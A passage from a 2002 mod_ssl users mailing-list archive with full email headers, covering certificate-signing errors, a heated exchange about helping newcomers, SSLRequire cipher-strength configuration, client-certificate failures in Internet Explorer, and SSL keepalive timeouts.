fake it." ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 23 19:54:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA21954; Sat, 23 Mar 2002 19:53:07 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id TAA21934; Sat, 23 Mar 2002 19:52:37 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 38ED6BD2A; Sat, 23 Mar 2002 19:54:06 +0100 (CET) Date: Sat, 23 Mar 2002 19:54:06 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Error when signing my cert Message-ID: <20020323185406.GA20660@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <1151072532.20020323080020@e-box.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: <1151072532.20020323080020@e-box.dk> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sat, Mar 23, 2002 at 08:00:20AM +0100, Søren Neigaard wrote: > Please let me know if I'm asking the wrong question here. I'm a newbie, and > I really don't know how to get any further. > > I have followed the FAQ: > > http://www.modssl.org/docs/2.8/ssl_faq.html#ToC28 > > And I have made my own CA, but when I try to do: > > ./sign.sh server.csr > > I get the following error: > > Using configuration from ca.config > ./ca.key: No such file or directory > trying to load CA private key > 52039:error:02001002:system library:fopen:No such file or > directory:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:245:fopen('./ca.key','r') > 52039:error:20074002:BIO routines:FILE_CTRL:system > lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:247: > CA verifying: server.crt <-> CA cert > server.crt: No such file or directory > 52040:error:02001002:system library:fopen:No such file or > directory:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:245:fopen('server.crt','r') > 52040:error:20074002:BIO routines:FILE_CTRL:system > lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_file.c:247: > > > What is this, and how do I fix it? > Read what it says - "No such file or directory" for both ./ca.key and server.crt Start with http://www.modssl.org/docs/2.8/ssl_faq.html#ToC29 and follow the directions exactly how they are written in the FAQ. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 23 20:50:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA24168; Sat, 23 Mar 2002 20:49:26 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from sttlpop6.sttl.uswest.net id UAA24146; Sat, 23 Mar 2002 20:49:00 +0100 (MET) Received: (qmail 74597 invoked by uid 0); 23 Mar 2002 19:48:56 -0000 Received: from unknown (HELO thecreek) (67.40.5.73) by sttlpop6.sttl.uswest.net with SMTP; 23 Mar 2002 19:48:56 -0000 Date: Sat, 23 Mar 2002 11:48:59 -0800 Message-ID: <000b01c1d2a3$c671e620$49052843@qwest.net> From: "Baldwin Martin" To: modssl-users@modssl.org References: <1151072532.20020323080020@e-box.dk> <20020323185406.GA20660@marvin-lnx.int.tele.dk> Subject: Re: Error when signing my cert Organization: Lucy's Creek Company MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 Disposition-Notification-To: "Baldwin Martin" X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Baldwin Martin" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I got your message but I am newer than you, so I must say I can't be any help. It seems that nobody wants to answer questions, or perhaps I am doing it wrong. Best Wishes, Baldwin ----- Original Message ----- From: "Mads Toftum" To: Sent: Saturday, March 23, 2002 10:54 AM Subject: Re: Error when signing my cert > On Sat, Mar 23, 2002 at 08:00:20AM +0100, Søren Neigaard wrote: > > Please let me know if I'm asking the wrong question here. I'm a newbie, and > > I really don't know how to get any further. > > > > I have followed the FAQ: > > > > http://www.modssl.org/docs/2.8/ssl_faq.html#ToC28 > > > > And I have made my own CA, but when I try to do: > > > > ./sign.sh server.csr > > > > I get the following error: > > > > Using configuration from ca.config > > ./ca.key: No such file or directory > > trying to load CA private key > > 52039:error:02001002:system library:fopen:No such file or > > directory:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/b ss_file.c:245:fopen('./ca.key','r') > > 52039:error:20074002:BIO routines:FILE_CTRL:system > > lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_fil e.c:247: > > CA verifying: server.crt <-> CA cert > > server.crt: No such file or directory > > 52040:error:02001002:system library:fopen:No such file or > > directory:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/b ss_file.c:245:fopen('server.crt','r') > > 52040:error:20074002:BIO routines:FILE_CTRL:system > > lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_fil e.c:247: > > > > > > What is this, and how do I fix it? > > > Read what it says - "No such file or directory" for both ./ca.key and server.crt > Start with http://www.modssl.org/docs/2.8/ssl_faq.html#ToC29 and follow the > directions exactly how they are written in the FAQ. > > vh > > Mads Toftum > -- > With a rubber duck, one's never alone. > -- "The Hitchhiker's Guide to the Galaxy" > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 23 21:01:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA24505; Sat, 23 Mar 2002 21:00:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from fe070.worldonline.dk id UAA24440; Sat, 23 Mar 2002 20:59:28 +0100 (MET) Received: (qmail 3356 invoked by uid 0); 23 Mar 2002 19:59:21 -0000 Received: from unknown (HELO NEIGAARD?MOB) (213.237.13.224) by fe070.worldonline.dk with SMTP; 23 Mar 2002 19:59:21 -0000 Date: Sat, 23 Mar 2002 20:58:30 +0100 From: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-Mailer: The Bat! (v1.53d) X-Priority: 3 (Normal) Message-ID: <262749483.20020323205830@e-box.dk> To: Baldwin Martin Subject: Re[2]: Error when signing my cert In-Reply-To: <000b01c1d2a3$c671e620$49052843@qwest.net> References: <1151072532.20020323080020@e-box.dk> <20020323185406.GA20660@marvin-lnx.int.tele.dk> <000b01c1d2a3$c671e620$49052843@qwest.net> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi I agree, nobody on this list wants newbies :( /Søren Saturday, March 23, 2002, 8:48:59 PM, Baldwin wrote: BM> Hi, BM> I got your message but I am newer than you, so I must say I can't be any BM> help. BM> It seems that nobody wants to answer questions, or perhaps I am doing it BM> wrong. BM> Best Wishes, BM> Baldwin BM> ----- Original Message ----- BM> From: "Mads Toftum" BM> To: BM> Sent: Saturday, March 23, 2002 10:54 AM BM> Subject: Re: Error when signing my cert >> On Sat, Mar 23, 2002 at 08:00:20AM +0100, Søren Neigaard wrote: >> > Please let me know if I'm asking the wrong question here. I'm a newbie, BM> and >> > I really don't know how to get any further. >> > >> > I have followed the FAQ: >> > >> > http://www.modssl.org/docs/2.8/ssl_faq.html#ToC28 >> > >> > And I have made my own CA, but when I try to do: >> > >> > ./sign.sh server.csr >> > >> > I get the following error: >> > >> > Using configuration from ca.config >> > ./ca.key: No such file or directory >> > trying to load CA private key >> > 52039:error:02001002:system library:fopen:No such file or >> > BM> directory:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/b BM> ss_file.c:245:fopen('./ca.key','r') >> > 52039:error:20074002:BIO routines:FILE_CTRL:system >> > BM> lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_fil BM> e.c:247: >> > CA verifying: server.crt <-> CA cert >> > server.crt: No such file or directory >> > 52040:error:02001002:system library:fopen:No such file or >> > BM> directory:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/b BM> ss_file.c:245:fopen('server.crt','r') >> > 52040:error:20074002:BIO routines:FILE_CTRL:system >> > BM> lib:/usr/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_fil BM> e.c:247: >> > >> > >> > What is this, and how do I fix it? >> > >> Read what it says - "No such file or directory" for both ./ca.key and BM> server.crt >> Start with http://www.modssl.org/docs/2.8/ssl_faq.html#ToC29 and follow BM> the >> directions exactly how they are written in the FAQ. >> >> vh >> >> Mads Toftum >> -- >> With a rubber duck, one's never alone. >> -- "The Hitchhiker's Guide to the Galaxy" >> ______________________________________________________________________ >> Apache Interface to OpenSSL (mod_ssl) www.modssl.org >> User Support Mailing List modssl-users@modssl.org >> Automated List Manager majordomo@modssl.org >> BM> ______________________________________________________________________ BM> Apache Interface to OpenSSL (mod_ssl) www.modssl.org BM> User Support Mailing List modssl-users@modssl.org BM> Automated List Manager majordomo@modssl.org -- Med venlig hilsen/Best regards, Søren Neigaard mailto:neigaard@e-box.dk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Mar 23 23:43:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA00520; Sat, 23 Mar 2002 23:42:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id XAA00511; Sat, 23 Mar 2002 23:41:58 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 4814FBD2B; Sat, 23 Mar 2002 23:43:28 +0100 (CET) Date: Sat, 23 Mar 2002 23:43:28 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: Re[2]: Error when signing my cert Message-ID: <20020323224328.GB21126@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <1151072532.20020323080020@e-box.dk> <20020323185406.GA20660@marvin-lnx.int.tele.dk> <000b01c1d2a3$c671e620$49052843@qwest.net> <262749483.20020323205830@e-box.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: <262749483.20020323205830@e-box.dk> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sat, Mar 23, 2002 at 08:58:30PM +0100, Søren Neigaard wrote: > Hi > > I agree, nobody on this list wants newbies :( > To some extent I actually agree with you - but our reasons are probably different. First of all: setting up an SSL server is serious business, and when done incorrectly it is at best something that gives you a false sense of security, at its worst you end up with less security. This is the main reason that I think some people might be better off getting experienced people to run their servers instead of fumbling blindly. The other reason is that some people does not spend even a minimal amount of time trying to understand the error messages that they get or as in this case does not try to understand it even when somebody has taken time to make it even more obvious. Enough luserbashing (I'm probably just taking out my bad mood and lack of sleep on the nearest target) I suggest that you try creating your certificates as described in http://www.modssl.org/docs/2.8/ssl_faq.html#cert-dummy you may wish to change the command ``make certificate'' slightly such that it is: make certificate TYPE=CUSTOM vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 08:50:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id IAA02259; Mon, 25 Mar 2002 08:49:26 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from bnls902a id IAA02228; Mon, 25 Mar 2002 08:49:00 +0100 (MET) Received: by bnls205a.sni.co.uk with Internet Mail Service (5.5.2653.19) id ; Mon, 25 Mar 2002 07:48:41 -0000 Message-ID: <077AD8BDA52CD41197E900104B42A584EF90A6@bnls230a.sni.co.uk> From: "Bray, Mike" To: "'modssl-users@modssl.org'" Subject: RE: error page on failure to negotiate ssl connection Date: Mon, 25 Mar 2002 07:49:11 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Bray, Mike" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users See my previous entry, basically you have to: Allow all ciphers restrict the root directory on CIPHER key size put in a 403 error document, this should be in a directory outside the root with an alias to that directory eg. ErrorDocument 403 http://url/security/403.html Alias /security /../errordir SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128 Note: If you have any rewrites these will operate before the key size is checked unless you put the Rewrites at the directory level. You should use full URL for the 403 document otherwise Apache does a redirect to https://url/security/403.html and you could get into a n infinite loop on the https. Regards Mike Bray -----Original Message----- From: Philip Ravenscroft [mailto:philip@givingcapital.com] Sent: Friday, March 22, 2002 6:33 PM To: modssl-users@modssl.org Subject: error page on failure to negotiate ssl connection We are using server-gated cryptography to mandate 128 bit key strength, but to also upgrade export browsers. However, we would like users who do not have adequate ssl support to see an error page we create rather than whatever their browser's error message it. Is there a way to do this with apache+mod_ssl? I imagine it's a bit of a chicken-and-egg problem because in order to redirect the user to an error page, a ssl connection has to be made at the lower cipher strength. Philip ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 08:53:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id IAA02486; Mon, 25 Mar 2002 08:52:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mhub.AXP.MDX.AC.UK id IAA02432; Mon, 25 Mar 2002 08:51:35 +0100 (MET) Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636) id <01KFRQNPW3KW00PGHG@mdx.ac.uk> for modssl-users@modssl.org; Mon, 25 Mar 2002 07:53:53 +0000 (GMT) Received: from mdx-bg-staff1.nw.mdx.ac.uk (mdx-bg-staff1.mdx.ac.uk [158.94.39.4]) by mdx.ac.uk (PMDF V6.1-1 #38636) with ESMTP id <01KFRQNPLCHQ00XK80@mdx.ac.uk> for modssl-users@modssl.org; Mon, 25 Mar 2002 07:53:52 +0000 (GMT) Received: from MDX-BG-STAFF1/SpoolDir by mdx-bg-staff1.nw.mdx.ac.uk (Mercury 1.48); Mon, 25 Mar 2002 07:51:07 +0000 Received: from SpoolDir by MDX-BG-STAFF1 (Mercury 1.48); Mon, 25 Mar 2002 07:50:52 +0000 Date: Mon, 25 Mar 2002 07:50:51 +0000 From: a.moon@mdx.ac.uk Subject: RE: error page on failure to negotiate ssl connection To: modssl-users@modssl.org Message-id: <8DDD8772CD8@mdx-bg-staff1.nw.mdx.ac.uk> Content-transfer-encoding: 7BIT X-Autoreply-From: X-Comment: Middlesex University has scanned this message for viruses. Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: a.moon@mdx.ac.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am not in the office for the week 18-22 March 2002 If it's an Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter that requires urgent attention then please contact either Kirsteen1 or Sanjay1 who should be able to help. Otherwise I will contact you as soon as possible on my return. If you are student on MKT3035 GIS for Business - I will contact you asap or if urgent please contact the module tutor All the best Alex ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 10:50:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA08710; Mon, 25 Mar 2002 10:49:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.skylink.de id KAA08692; Mon, 25 Mar 2002 10:48:48 +0100 (MET) Received: from host (office-gw.skylink.de [212.2.32.4]) by mail.skylink.de (8.11.0/8.11.0) with SMTP id g2P9ml714368 for ; Mon, 25 Mar 2002 10:48:47 +0100 Message-ID: <007601c1d3e2$f61dc3e0$2500a8c0@skylink.de> From: "Daniel Chabrol" To: Subject: Client-certificates are sporadically dying Date: Mon, 25 Mar 2002 10:53:39 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Daniel Chabrol" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello modssl-users! My suspicion is that IE5.5 has liability for this problem. But maybe someone has made similar experiences and can give a hint: I noticed a strange behaviour (mod_ssl/2.8.5, OpenSSL/0.9.3a, Internet Explorer 5.5 SP2). You install a client-certificate and everything works fine. After a while the certificate sporadic (some days - some weeks) "dies", and you can't connect to the secured site. The modssl-log just reports an ssl-handshake-failure if you try to connect with a "broken" cert. If you delete the cert and import (the same, old, original p12 file) it a second time, it works again. So I suppose the certificate itself has nothing to do with this strange effect. Best regards, D.C. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 11:12:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA10507; Mon, 25 Mar 2002 11:11:50 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id LAA10319; Mon, 25 Mar 2002 11:10:44 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 971404CE617; Mon, 25 Mar 2002 11:10:43 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2P6G6x16471; Mon, 25 Mar 2002 07:16:06 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from gull.prod.itd.earthlink.net id DAA10239; Mon, 25 Mar 2002 03:57:11 +0100 (MET) Received: from sdn-ar-007casfrmp006.dialsprint.net ([158.252.214.8] helo=RON1QM4JVWEP50) by gull.prod.itd.earthlink.net with smtp (Exim 3.33 #1) id 16pKfN-000556-00 for modssl-users@modssl.org; Sun, 24 Mar 2002 18:57:02 -0800 From: "RON MCKEEVER" To: Subject: RE: Re[2]: Error when signing my cert Date: Sun, 24 Mar 2002 18:56:51 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <20020323224328.GB21126@marvin-lnx.int.tele.dk> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "RON MCKEEVER" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Something I would like to add to this last email. Im SURE at one time in your life you where NEW at creating a "SSL server" and you asked questions also. Life is all about learning and sharing. So get over you your self, and if you dont like this user list, un-unsubscribe. Ron -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]On Behalf Of Mads Toftum Sent: Saturday, March 23, 2002 2:43 PM To: modssl-users@modssl.org Subject: Re: Re[2]: Error when signing my cert On Sat, Mar 23, 2002 at 08:58:30PM +0100, Søren Neigaard wrote: > Hi > > I agree, nobody on this list wants newbies :( > To some extent I actually agree with you - but our reasons are probably different. First of all: setting up an SSL server is serious business, and when done incorrectly it is at best something that gives you a false sense of security, at its worst you end up with less security. This is the main reason that I think some people might be better off getting experienced people to run their servers instead of fumbling blindly. The other reason is that some people does not spend even a minimal amount of time trying to understand the error messages that they get or as in this case does not try to understand it even when somebody has taken time to make it even more obvious. Enough luserbashing (I'm probably just taking out my bad mood and lack of sleep on the nearest target) I suggest that you try creating your certificates as described in http://www.modssl.org/docs/2.8/ssl_faq.html#cert-dummy you may wish to change the command ``make certificate'' slightly such that it is: make certificate TYPE=CUSTOM vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 11:13:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA10593; Mon, 25 Mar 2002 11:12:26 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id LAA10322; Mon, 25 Mar 2002 11:10:45 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id A6B494CE74B; Mon, 25 Mar 2002 11:10:43 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2P6Fth16459; Mon, 25 Mar 2002 07:15:55 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from xenon.newace.ca id CAA05958; Mon, 25 Mar 2002 02:40:58 +0100 (MET) Received: from stephan (argon [204.92.222.5]) by xenon.newace.ca (8.12.2/8.12.2) with SMTP id g2P1dYkv028919 for ; Sun, 24 Mar 2002 20:39:34 -0500 Message-ID: <000c01c1d39d$e4dd0220$0200a8c0@newace.int> From: "Stephan Edelman" To: Subject: Re: customers get "page cannot be displayed" when browsing securely Date: Sun, 24 Mar 2002 20:39:24 -0500 Organization: NewAce Corporation MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0009_01C1D373.FBC3D6A0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Stephan Edelman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_0009_01C1D373.FBC3D6A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hello all, This problem has just cropped up with an upgrade of Apache and mod_ssl. When our customers are browsing our site securely and "pause" while = filing in information (into an order form, for example), the Apache = server closes the connection (presumably because it was a keepalive = connection and it timed out), but when the customer does a submit of the = orderform, a "Page cannot be displayed" message comes up. Looking into this a bit closer, the web server is indeed closing the = connection, but the browser still thinks it's connected. When the user = POSTs the form, a TCP connection-reset is sent back, causing the browser = to display "Page cannot be displayed or DNS error" (in IE 6). Incidently, when the user takes less time to fill in the order form = (i.e., before Apache closes the connection) the order form can be = submitted just fine.=20 This is what shows up in the ssl_engine_log file: [24/Mar/2002 20:23:05 22913] [info] Connection to child 7 closed with = standard shutdown (server secure.newace.ca:443, client 204.92.222.5) We're running Apache/1.3.23 (Unix) PHP/3.0.18 mod_ssl/2.8.7 = OpenSSL/0.9.6c, on Kernel 2.4.17 SMP. Is there a way to specify the timeout in Apache, or mod_ssl? Any = suggestions? Please reply to my email and this list. Regards, =20 Stephan. --- Stephan A. Edelman, B.Eng. NewAce Corporation http://www.newace.com Toll Free: 1-877-463-9223 x21 Tel: +1 519 336-4837 x21 Fax:+1 519 336-4046 ------=_NextPart_000_0009_01C1D373.FBC3D6A0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hello all,
 
This problem has just cropped up with an = upgrade of=20 Apache and mod_ssl.
 
When our customers are browsing our site securely=20 and "pause" while filing in information (into an order form, for = example),=20 the Apache server closes the connection (presumably because it was a = keepalive=20 connection and it timed out), but when the customer does a submit of the = orderform, a "Page cannot be displayed" message comes up.
 
Looking into this a bit closer, the web server is=20 indeed closing the connection, but the browser still thinks it's = connected.=20 When the user POSTs the form, a TCP connection-reset is sent back, = causing the=20 browser to display "Page cannot be displayed or DNS error" (in IE=20 6).
 
Incidently, when the user takes less time to fill in = the order=20 form (i.e., before Apache closes the connection) the order form can be = submitted=20 just fine.
 
This is what shows up in the ssl_engine_log = file:
 
[24/Mar/2002 20:23:05 22913] [info]  Connection = to child=20 7 closed with standard shutdown (server secure.newace.ca:443, client=20 204.92.222.5)
 
We're running Apache/1.3.23 (Unix) PHP/3.0.18 = mod_ssl/2.8.7=20 OpenSSL/0.9.6c, on Kernel 2.4.17 SMP.
 
Is there a way to specify the timeout in = Apache, or=20 mod_ssl? Any suggestions? Please reply to my email and this = list.
 
Regards,
 
Stephan.
---
Stephan A. Edelman, B.Eng.
NewAce = Corporation
http://www.newace.com
Toll Free:=20 1-877-463-9223 x21
Tel: +1 519 336-4837 x21
Fax:+1 519=20 336-4046
------=_NextPart_000_0009_01C1D373.FBC3D6A0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 11:23:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA11491; Mon, 25 Mar 2002 11:22:38 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id LAA11431; Mon, 25 Mar 2002 11:21:55 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id 8ED4FBD2B; Mon, 25 Mar 2002 11:23:27 +0100 (CET) Date: Mon, 25 Mar 2002 11:23:27 +0100 From: Mads Toftum To: modssl-users@modssl.org Cc: Stephan Edelman Subject: Re: customers get "page cannot be displayed" when browsing securely Message-ID: <20020325102327.GI31238@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org, Stephan Edelman References: <000c01c1d39d$e4dd0220$0200a8c0@newace.int> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <000c01c1d39d$e4dd0220$0200a8c0@newace.int> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sun, Mar 24, 2002 at 08:39:24PM -0500, Stephan Edelman wrote: > Hello all, > > This problem has just cropped up with an upgrade of Apache and mod_ssl. > > When our customers are browsing our site securely and "pause" while filing in information (into an order form, for example), the Apache server closes the connection (presumably because it was a keepalive connection and it timed out), but when the customer does a submit of the orderform, a "Page cannot be displayed" message comes up. > > Looking into this a bit closer, the web server is indeed closing the connection, but the browser still thinks it's connected. When the user POSTs the form, a TCP connection-reset is sent back, causing the browser to display "Page cannot be displayed or DNS error" (in IE 6). > > Incidently, when the user takes less time to fill in the order form (i.e., before Apache closes the connection) the order form can be submitted just fine. > > This is what shows up in the ssl_engine_log file: > > [24/Mar/2002 20:23:05 22913] [info] Connection to child 7 closed with standard shutdown (server secure.newace.ca:443, client 204.92.222.5) > > We're running Apache/1.3.23 (Unix) PHP/3.0.18 mod_ssl/2.8.7 OpenSSL/0.9.6c, on Kernel 2.4.17 SMP. > > Is there a way to specify the timeout in Apache, or mod_ssl? Any suggestions? Please reply to my email and this list. > Could you try with another browser instead of ie - the error messages in ie are not very useful for debugging. Given that the browser is ie, then you're probably hitting one of the BrowserMatch directives - another thing to check is your SSLSessionCache settings. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 25 11:24:30 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA11561; Mon, 25 Mar 2002 11:23:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from bnls902a id LAA11424; Mon, 25 Mar 2002 11:21:47 +0100 (MET) Received: by bnls205a.sni.co.uk 